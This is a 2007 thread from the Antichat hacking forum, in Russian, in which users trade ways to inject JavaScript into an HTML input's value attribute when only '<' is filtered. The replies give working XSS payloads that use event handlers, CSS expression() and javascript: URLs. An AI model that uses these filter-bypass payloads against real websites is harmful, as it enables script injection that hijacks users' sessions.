Форум АНТИЧАТ - Провести XSS в <input>

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)

- - Провести XSS в <input> (https://forum.antichat.xyz/showthread.php?t=43397)

hhover

30.06.2007 09:08

Провести XSS в <input>

Собственно <input value="XSS" />
Фильтруется только <

Код:

<input value="" style=background-image:url('javascript:alert();'); />

Пашет только в ИЕ.
Есть другие способы javascript всунуть, кроме background-image ?

V1k	30.06.2007 09:47

<input value="" onmouseover="alert('xek')" style="position:absolute;top:0;left:0;width:1600;h eight:1200;z-index:100;left:expression(alert('xek'));"/>
для Оперы и Огнелиса - Input растягивается на всю страницу и JavaScript пишется в onMouseOver.
для ИЕ есть возможность исполнять JavaScript через стиль используя expression()

hhover

30.06.2007 10:13

Что-то я по серъезному тупанул, вообще забыл про события в javascript. =\
Спасибо, проблема решена.

V1k	18.08.2007 11:58

Оказывается, есть и кроссбраузерный вариант:
<input value="" type=image src="javascript:alert()"/>
Но работает он только если тип input'a еще не был определен.

bul.666

18.08.2007 15:07

<input type=button OnClick="javascript:alert()">

Наверное так тоже сработает, хотя хз я все позабыл на хрен! =/

Время: 06:46